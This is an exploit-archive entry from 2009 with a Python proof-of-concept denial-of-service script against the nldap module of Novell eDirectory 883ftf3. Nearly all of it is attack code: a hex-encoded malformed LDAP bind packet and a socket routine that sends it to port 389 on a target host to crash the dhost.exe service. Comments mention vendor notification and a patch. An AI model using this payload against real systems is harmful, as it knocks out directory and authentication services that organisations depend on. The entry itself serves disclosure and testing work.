Novell eDirectory 883ftf3 nldap module Denial of Service

2009-11-16T00:00:00
ID 1337DAY-ID-9776
Type zdt
Reporter Matteo Memelli
Modified 2009-11-16T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            ========================================================
Novell eDirectory 883ftf3 nldap module Denial of Service
========================================================


# Title: Novell eDirectory 883ftf3 nldap module Denial of Service
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Matteo Memelli
# Published: 2009-11-16
# Verified: yes

view source
print?
#!/usr/bin/python
# 22/03/2009
# Novell eDirectory 883ftf3 nldap module DOS
# Matteo Memelli
#
# A malformed bind LDAP packet can make dhost.exe service crashing.
# 24/03/2009 Vendor notification; patched in 885 release
#
 
import sys
from socket import *
 
payload = (
          "\x30\x7E\x02\x02\x01\x60\x77\x02\x84\xFF\xFF\xFF\xFF\x03\x04\x84"
          "\xFF\xFF\xFF\xFF\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61"
          "\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D"
          "\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68\x2C\x64"
          "\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e"
          "\x6e\x61\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64"
          "\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68"
          "\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x63\x6F\x6D\x80\x00"
          )
 
s = socket(AF_INET, SOCK_STREAM)
print 'connecting...'
s.connect((sys.argv[1], 389))
print 'sending payload...'
s.send(payload)
print s.recv(1024)
s.close()
print 'Done!'



#  0day.today [2018-03-12]  #